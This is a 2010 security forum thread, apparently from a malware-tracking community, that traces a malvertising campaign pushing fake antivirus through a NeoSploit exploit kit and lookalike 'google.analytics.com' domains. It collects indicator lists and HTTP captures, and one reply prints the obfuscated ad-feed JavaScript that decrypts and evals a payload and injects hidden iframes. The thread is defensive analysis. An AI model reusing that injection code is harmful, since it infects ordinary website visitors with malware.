Author Topic: google.analytics.com.tklaxlxvedkt.info - FakeAV/Drive By  (Read 12745 times)

0 Members and 1 Guest are viewing this topic.

February 26, 2010, 05:12:30 pm
Read 12745 times

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Seeings quite a clients hitting this host:

http://google.analytics.com.tklaxlxvedkt.info/

Directories are all over the place:
/kav/kav3%20.asp/
/kav/kav3.exe/
/kav/kav3.php/
/kavo/avorp1kav3%20.asp/
/kavo/avorp1kav3.py/
/kavs/kav6.php/
/nte/avorp1kav6.php/
/kav/kav3.py/
/kavs/kav6%20.asp/

Serving up PDF's, Java Classes, and also fakeav. The fakeAV is being downloaded with the Java useragent after the malicious are classes served up finish executing.

FakeAV binary location:
google.analytics.com.tklaxlxvedkt.info/kav/kav3.php/eHc8d7c382V0100f070006R8db29656102T8351602d201l0409K71925c29303J030006010

VirusTotal.com Report:
http://www.virustotal.com/analisis/fa1df643d780e7f13b35981283940c4e2b5d3f053706ab03be90fc2a38bd9d7e-1267199064

February 26, 2010, 05:29:09 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
It is a NeoSploit exploit kit and distributes fake av.
Ruining the bad guy's day

February 26, 2010, 07:51:24 pm
Reply #2

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Found a bunch more:

google.analytics.com.jklnznqvztu.info
google.analytics.com.tluaweyermg.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.zugponkeqtzz.info

All resolve to the same IP:

75.125.183.50

March 01, 2010, 06:33:03 pm
Reply #3

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
More:

google.analytics.com.hzlyaejcvmat.info - 69.174.245.150
google.analytics.com.lsvoenxxyya.info - 69.174.245.148
google.analytics.com.dbvvwrkgycfa.info - 69.174.245.147
google.analytics.com.yfguydudorip.info - 69.174.245.147
google.analytics.com.dcghkoixsagu.info - 72.51.41.155
google.analytics.com.gopbaqvgprvh.info - 72.51.41.155
google.analytics.com.dygpcewrjnw.info - 69.174.245.147
google.analytics.com.inxvwrxogrc.info - 69.174.245.150
google.analytics.com.kijksoeohxze.info -  72.51.41.155
google.analytics.com.prtrkmxkpctw.info - 75.125.183.50




March 01, 2010, 09:45:05 pm
Reply #4

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Total found so far again:


google.analytics.com.byuigracdnjj.info
google.analytics.com.cvybexpnqhlx.info
google.analytics.com.dbvvwrkgycfa.info
google.analytics.com.dcghkoixsagu.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.dygpcewrjnw.info
google.analytics.com.eliyisgtkaj.info
google.analytics.com.gopbaqvgprvh.info
google.analytics.com.hzlyaejcvmat.info
google.analytics.com.inxvwrxogrc.info
google.analytics.com.jgvsjnhmvngn.info
google.analytics.com.jklnznqvztu.info
google.analytics.com.jttyhhvcxmbz.info
google.analytics.com.kijksoeohxze.info
google.analytics.com.lsvoenxxyya.info
google.analytics.com.omvdbdcknpct.info
google.analytics.com.prtrkmxkpctw.info
google.analytics.com.pzignbfxspou.info
google.analytics.com.qlgkmytdvyjx.info
google.analytics.com.tklaxlxvedkt.info
google.analytics.com.tluaweyermg.info
google.analytics.com.uuyvsrbtpjhl.info
google.analytics.com.xkduqnxfpnfg.info
google.analytics.com.yfguydudorip.info
google.analytics.com.yggxvnwumcqv.info
google.analytics.com.yhaidebpfltr.info
google.analytics.com.zelhnalbivd.info
google.analytics.com.zugponkeqtzz.info

March 01, 2010, 11:30:10 pm
Reply #5

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
This seems to be pretty widespread. The list of referrers is pretty extensive, looks like some advertising services did some business with some unsavory characters again.


Some of the referrering domains to the collection of malicious google.analytics.*.info domains:

Code: [Select]
ad.doubleclick.net
ad.yieldmanager.com
articles.moneycentral.msn.com
astrocenter.astrology.msn.com
autos.kosmix.com
autos.msn.com
blogs2.startribune.com
boards.msn.com
community.foxsports.com
creative.adonion.com
creative.clicksor.com
cyclops.prod.untd.com
data.cnbc.com
digg.com
eb.adbureau.net
entertainment.msn.com
environment-msnbc.newsvine.com
fordtruckworld.tenmagazines.com
gasbuddy.com
health.msn.com
integration.mtvnservices.com
lifestyle.msn.com
local.msn.com
mbd.scout.com
media.bannerimg.com
media.www.gwhatchet.com
moneycentral.msn.com
msn.careerbuilder.com
msn.foxsports.com
music.msn.com
my.juno.com
my.msn.com
nbcsports.newsvine.com
pd.startribune.com
player.jambovideonetwork.com
pr1.shoe-metro.us
profootball.scout.com
rad.msn.com
realestate.msn.com
ro-d.redorbit.com
secret5trading.com
showbiz411.blogs.thr.com
splashpage.mtv.com
tag.admeld.com
tennessee.scout.com
tv.msn.com
video.bobvila.com
view.atdmt.com
weather.msn.com
wonderwall.msn.com
worldblog.msnbc.msn.com
www.bobvila.com
www.business.com
www.buy.com
www.cheboygannews.com
www.cnbc.com
www.delish.com
www.evite.com
www.greatschools.org
www.heatvisionblog.com
www.hollywoodreporter.com
www.kob.com
www.legacy.com
www.merriam-webster.com
www.msnbc.msn.com
www.paperbackswap.com
www.redorbit.com
www.retrevo.com
www.soapcentral.com
www.startribune.com
www.thebluebanner.net
www.thelantern.com
www.theobr.com
www.thrfeed.com
www.tvland.com
www.upi.com
www.wunderground.com

March 02, 2010, 04:58:08 pm
Reply #6

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Two more:

google.analytics.com.uentfkblzpxx.info
google.analytics.com.uwbhpcrydgta.info

March 03, 2010, 05:19:10 pm
Reply #7

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Turned a bunch of info over to some experts and they are tracking down the malvertising and trying to identify the affiliates. This was described by as a "nest o' badness" and I do not think that is an understatement. Hopefully I will have a larger list of domains/IP's contributing to this.

March 03, 2010, 07:11:02 pm
Reply #8

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179

March 04, 2010, 10:01:18 pm
Reply #9

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
After conversations with US-CERT, they will be publishing an alert about this tomorrow/monday.

March 07, 2010, 08:02:11 am
Reply #10

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
So I finally found the javascript causing the requests to go to the google.analytics.com.*.info domains. It appears that javascript coming back from adrotator.mediaplex.feed-mnptr.com had encoded+obfuscated+encrypted javascript that redirects people to the google.analytics.com.*.info domains.

Here is the portion of the malicious javascript that it was serving up previously:
Code: [Select]
var RSA={encrypt:function(m,e,n){m=BASE64.encode(m);var asci=[],coded='';for(var i=0;i<m.length;i+=3){var tmpasci='1';for(var h=0;h<3;h++){if(i+h<m.length){tmpstr=this.ord(m.charAt(i+h))-30;if(tmpstr.length<2)tmpstr='0'+tmpstr;}else break;tmpasci+=tmpstr;}asci.push(tmpasci+'1')}for(var k=0;k<asci.length;k++){var resultmod=this.powmod(asci[k],e,n);var chunk=resultmod.toString(16);while(chunk.length<7)chunk='0'+chunk;coded+=chunk}coded=coded.replace(new RegExp('^+|+$','g'),'');return this.hexstr(coded)},decrypt:function(c,d,n){c=this.strhex(c);var decryptarray=[],deencrypt='',resultd='';for(var i=0;i<c.length;i+=7)decryptarray.push(c.substr(i,7));for(var u=0;u<decryptarray.length;u++)if(decryptarray[u]=='')decryptarray.splice(u,1);for(var u=0;u<decryptarray.length;u++){var resultmod=this.powmod(parseInt(decryptarray[u],16),d,n)+'';deencrypt+=resultmod.substr(1,resultmod.length-2)}for(var u=0;u<deencrypt.length;u+=2)resultd+=this.chr(parseInt(deencrypt.substr(u,2),10)+30);return BASE64.decode(resultd)},ord:function(chr){return ASCII.ord(chr)},chr:function(num){return ASCII.chr(num)},mod:function(g,l){return g-(l * Math.floor(g/l))},powmod:function(base,exp,modulus){var accum=1,i=0,basepow2=base;while((exp>>i)>0){if(((exp>>i)&1)==1)accum=this.mod((accum * basepow2),modulus);basepow2=this.mod((basepow2 * basepow2),modulus);i++}return accum},hexstr:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i+=2){var bte=parseInt(''+str.charAt(i)+str.charAt(i+1),16).toString(10);result+=ASCII.chr(bte)}return result},strhex:function(str){return str;var result='';for(var i=0,len=str.length;i<len;i++){var bte=ASCII.ord(str.charAt(i)).toString(16);result+=bte.length==2?bte:'0'+bte;}return result}};var ASCII={translations:{js2php:{1026:128,1027:129,8218:130,1107:131,8222:132,8230:133,8224:134,8225:135,8364:136,8240:137,1033:138,8249:139,1034:140,1036:141,1035:142,1039:143,1106:144,8216:145,8217:146,8220:147,8221:148,8226:149,8211:150,8212:151,65533:152,8482:153,1113:154,8250:155,1114:156,1116:157,1115:158,1119:159,1038:161,1118:162,1032:163,1168:165,1025:168,1028:170,1031:175,1030:178,1110:179,1169:180,1105:184,8470:185,1108:186,1112:188,1029:189,1109:190,1111:191,1040:192,1041:193,1042:194,1043:195,1044:196,1045:197,1046:198,1047:199,1048:200,1049:201,1050:202,1051:203,1052:204,1053:205,1054:206,1055:207,1056:208,1057:209,1058:210,1059:211,1060:212,1061:213,1062:214,1063:215,1064:216,1065:217,1066:218,1067:219,1068:220,1069:221,1070:222,1071:223,1072:224,1073:225,1074:226,1075:227,1076:228,1077:229,1078:230,1079:231,1080:232,1081:233,1082:234,1083:235,1084:236,1085:237,1086:238,1087:239,1088:240,1089:241,1090:242,1091:243,1092:244,1093:245,1094:246,1095:247,1096:248,1097:249,1098:250,1099:251,1100:252,1101:253,1102:254,1103:255},php2js:{128:1026,129:1027,130:8218,131:1107,132:8222,133:8230,134:8224,135:8225,136:8364,137:8240,138:1033,139:8249,140:1034,141:1036,142:1035,143:1039,144:1106,145:8216,146:8217,147:8220,148:8221,149:8226,150:8211,151:8212,152:65533,153:8482,154:1113,155:8250,156:1114,157:1116,158:1115,159:1119,161:1038,162:1118,163:1032,165:1168,168:1025,170:1028,175:1031,178:1030,179:1110,180:1169,184:1105,185:8470,186:1108,188:1112,189:1029,190:1109,191:1111,192:1040,193:1041,194:1042,195:1043,196:1044,197:1045,198:1046,199:1047,200:1048,201:1049,202:1050,203:1051,204:1052,205:1053,206:1054,207:1055,208:1056,209:1057,210:1058,211:1059,212:1060,213:1061,214:1062,215:1063,216:1064,217:1065,218:1066,219:1067,220:1068,221:1069,222:1070,223:1071,224:1072,225:1073,226:1074,227:1075,228:1076,229:1077,230:1078,231:1079,232:1080,233:1081,234:1082,235:1083,236:1084,237:1085,238:1086,239:1087,240:1088,241:1089,242:1090,243:1091,244:1092,245:1093,246:1094,247:1095,248:1096,249:1097,250:1098,251:1099,252:1100,253:1101,254:1102,255:1103}},ord:function(chr,dir){dir=dir||'js2php';if(!this.translations[dir])return null;chr=chr.charCodeAt(0);return(chr in this.translations[dir])?this.translations[dir][chr]:chr},chr:function(ord,dir){dir=dir||'php2js';if(!this.translations[dir])return null;ord=(ord in this.translations[dir])?this.translations[dir][ord]:ord;return String.fromCharCode(ord)}};var BASE64={alphabet:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;while(i<input.length){chr1=ASCII.ord(input.charAt(i++));chr2=ASCII.ord(input.charAt(i++));chr3=ASCII.ord(input.charAt(i++));enc1=chr1>>2;enc2=((chr1&3)<<4)|(chr2>>4);enc3=((chr2&15)<<2)|(chr3>>6);enc4=chr3&63;if(isNaN(chr2))enc3=enc4=64;else if(isNaN(chr3))enc4=64;output=output+this.alphabet.charAt(enc1)+this.alphabet.charAt(enc2)+this.alphabet.charAt(enc3)+this.alphabet.charAt(enc4)}return output},decode:function(input){var output='',chr1,chr2,chr3,enc1,enc2,enc3,enc4,i=0;input=input.replace(new RegExp('[^A-Za-z0-9+/=]','g'),'');while(i<input.length){enc1=this.alphabet.indexOf(input.charAt(i++));enc2=this.alphabet.indexOf(input.charAt(i++));enc3=this.alphabet.indexOf(input.charAt(i++));enc4=this.alphabet.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2 & 15)<<4)|(enc3>>2);chr3=((enc3 & 3)<<6)|enc4;output=output+ASCII.chr(chr1);if(enc3!=64)output=output+ASCII.chr(chr2);if(enc4!=64)output=output+ASCII.chr(chr3)}return output}}


statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);

var cd1 = "adr";
var cd2 = "otator.m";
var cd3 = "ediaplex.feed-mnptr.com";
var cur_domain = cd1 + cd2 + cd3;
       var all_t = "1,2,3,4,5,6,7,8,9";
       var mtch = all_t.match(statictml);
if ( mtch != null ) {
document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=260233594&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
                              
//
var jse1 = "htt"; var jse2 = "p://adr"; var jse3 = "otator.mediaple"; var jse4 = "x.feed-mnptr.com/stats_js_e.php?id=260233594";
var jse = jse1 + jse2 + jse3 + jse4;
document.write(unescape("%3Ciframe src='" + jse + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//


eval(RSA.decrypt('1c8e162194ee9b0fc499a16b2e423b376922958cda38cd50234229fa051a0742ecf1c22b4894d2e1526c13d66570af6256039b11934eaaa6292067d2e092b70a18b1f21422f606dd839108925e32edb3c316a1d7242708a29c620325137ca2170bc4003a6072c3fdbf2da9fd729c5fcd0af3295172a40d353fef13d30c2e044bc912eb149614207741efaa850d799412b990931f3efba394928b1aa73c32c4712c25f77662aec8d22a2da282879a040aa84f20f3083c2d7b4d30a7e0b52e1a1e22b00afd0e914113ccbe4d0c5bfa31568b7317633401ba627919dde2e066c9ea1d7147f0a9b7f813693ac31330201dd064925c196902237f21708460182ccd8113e527','14947943','64253471'));

}

All of this javascript just causes the following to get written into the document:

Code: [Select]
<iframe>width="1" height="1" style="visibility: hidden;" src="http://google.analytics.com.hzlyaejcvmat[dot]info/ld/kav2/" </iframe>

The registration stuff on feed-mnptr.com seems suspect:

Domain name: feed-mnptr.com

Registrant Contact:
   ReligionSeeke
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Administrative Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Technical Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

Billing Contact:
   Robert Robert Robert@gmail.com
   215-442-2238 fax: 215-442-2238
   22778 Wakefield Street
   Hatboro PA 19040
   us

DNS:
free01.editdns.net
free02.editdns.net

Created: 2010-01-30
Expires: 2011-01-30

Something very fishy going on....




March 24, 2010, 02:03:10 pm
Reply #11

jboyhb

  • Jr. Member

  • Offline
  • **

  • 11
More:

IP: 66.135.41.32

google.analytics(dot)com.mdmnegsxcytq.info/kav/kav5.php
google.analytics(dot)com.mdmnegsxcytq.info/kav/KAV5.py/oH5100219cV0100f036002R22c9ccec102T1aaa3015Q000002fa901801F0016000aJ11000601l0409K5b577271317

Wepawet:
benign

jsunpack:
Malicious
http://jsunpack.eyeprotectiongroup.com/dec/go?report=9b1a7c8123b3f0fa1a4225b6150fb7ca55c15823


March 25, 2010, 11:12:42 pm
Reply #12

mwollenweber

  • Newbie

  • Offline
  • *

  • 4
Does anyone have a sample of the PDF? It seems like the kav executable is after successful exploitation by the PDF. However, I have a Mac that downloaded the executable but I can't find the PDF on disk (yet). Has anyone seen it work on OS X? And if you have a sample please let me know. Thanks.

April 30, 2010, 04:35:52 pm
Reply #13

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Yahoo! is still doing business with some of these people apparently.

Request:
Code: [Select]
GET /cust.php?n=cust3 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockw
ave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/m
sword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xba
p, application/x-ms-application, */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdANplCgCfIksAAAAAAB-FFAAAAAAAAgAEA
AYAAAAAAP8AAAAGC1RkEgAAAAAAHZ0KAAAAAABvxxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAHYgUAAAAAAAIAAwAAAAAAH4XrUbge3T8fhetRuB7dPx-F61G4Ht0.H4XrUbg
e3T8AAAAAAADwPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO5nMQqMkjCOVE
-tNHXz8ZdCqW3h6dqVv9AKFTAAAAAA==,http%3A%2F%2Fd.tradex.openx.com%2Fck.php%3Foapar
ams%3D2__bannerid%3D2643__zoneid%3D1829__cb%3Da0101f785d__r_id%3D38f962825de0b640
a8012aa1fa0e632f__r_ts%3Dl1p0rs__oadest%3D%24,http%3A%2F%2Fd.tradex.openx.com%2Fa
fr.php%3Frefresh%3D45%26zoneid%3D1829%26cb%3Dinsert_random_number_here%26loc%3Dht
tp%253a%252f%252fd.tradex.openx.com%252fafr.php%253fzoneid%253d1826%2526cb%253din
sert_random_number_here,Z%3D728x90%26x%3Dhttp%253A%252F%252Fd%252Etradex%252Eopen
x%252Ecom%252Fck%252Ephp%253Foaparams%253D2%255F%255Fbannerid%253D2643%255F%255Fz
oneid%253D1829%255F%255Fcb%253Da0101f785d%255F%255Fr%255Fid%253D38f962825de0b640a
8012aa1fa0e632f%255F%255Fr%255Fts%253Dl1p0rs%255F%255Foadest%253D%24%26s%3D681434
%26_salt%3D237608200%26B%3D10%26u%3Dhttp%253A%252F%252Fd.tradex.openx.com%252Fafr
.php%253Frefresh%253D45%2526zoneid%253D1829%2526cb%253DINSERT_RANDOM_NUMBER_HERE%
2526loc%253Dhttp%25253A%25252F%25252Fd.tradex.openx.com%25252Fafr.php%25253Fzonei
d%25253D1826%252526cb%25253DINSERT_RANDOM_NUMBER_HERE%26r%3D0,5372d202-5462-11df-
80ae-001e6849f50f
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322;
 .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Host: sefito.com
Connection: Keep-Alive

Response:
Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 30 Apr 2010 14:11:54 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 158
<html>
<body>

<iframe src="http://google.analytics.com.uwyovhxythol.info/ld/kav4/" style="visib
ility:hidden;" width="1" height="1"></iframe>

</body>
</html>

Looks like they are adding intermediary domains between the two now sometimes, this is not nearly as widespread as before, but still wayyyyy to many people use Yeildmanagers advertising service and are potentially infecting their clients. Google too via DoubleClick.net:

Code: [Select]
GET /ld/kav4/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockw
ave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.m
s-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms
-powerpoint, application/msword, */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-425659629246
7410&output=html&h=90&slotname=3697413835&w=728&ea=0&flash=10.0.32.18&url=http%3A
%2F%2Fwww.sparkpeople.com%2Fresource%2Fgames_trivia.asp&dt=1272580330993&shv=r201
00414&correlator=1272580330993&frm=1&ga_vid=714073391.1263411881&ga_sid=127258007
9&ga_hid=2005532139&ga_fc=1&u_tz=-360&u_his=36&u_java=0&u_h=1050&u_w=1680&u_ah=10
00&u_aw=1680&u_cd=32&u_nplug=0&u_nmime=0&biw=814&bih=779&ifk=1157504475&fu=4&ifi=
1&dtd=78
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322;
 .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; MS-R
TC LM 8)
Host: google.analytics.com.vdifjlhzgas.info
Connection: Keep-Alive


domains to add to the list:
sefito.com - redirects to malvertising hosts.

google.analytics.com.aojegqdnwjvj.info
google.analytics.com.arffzejadvl.info
google.analytics.com.atdvtodlubs.info
google.analytics.com.fhccvgjohscc.info
google.analytics.com.ggfinekjvfmg.info
google.analytics.com.gijiinhivudu.info
google.analytics.com.ltxmklkxkuh.info
google.analytics.com.meejnagyeuzi.info
google.analytics.com.rqpqgqyjlmex.info
google.analytics.com.scvepuxdfzar.info
google.analytics.com.tbuygryyutcj.info
google.analytics.com.uwyovhxythol.info
google.analytics.com.vdifjlhzgas.info
google.analytics.com.waolovbichmz.info
google.analytics.com.zfnefclseth.info

All resolve to 67.18.213.122 for over the last week.

May 03, 2010, 02:34:11 pm
Reply #14

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
More on 67.18.213.122 :

google.analytics.com.pswdypsaxtqh.info
google.analytics.com.vdifjlhzgas.info
google.analytics.com.sxyayfphgqfo.info
google.analytics.com.mpmygrdjymz.info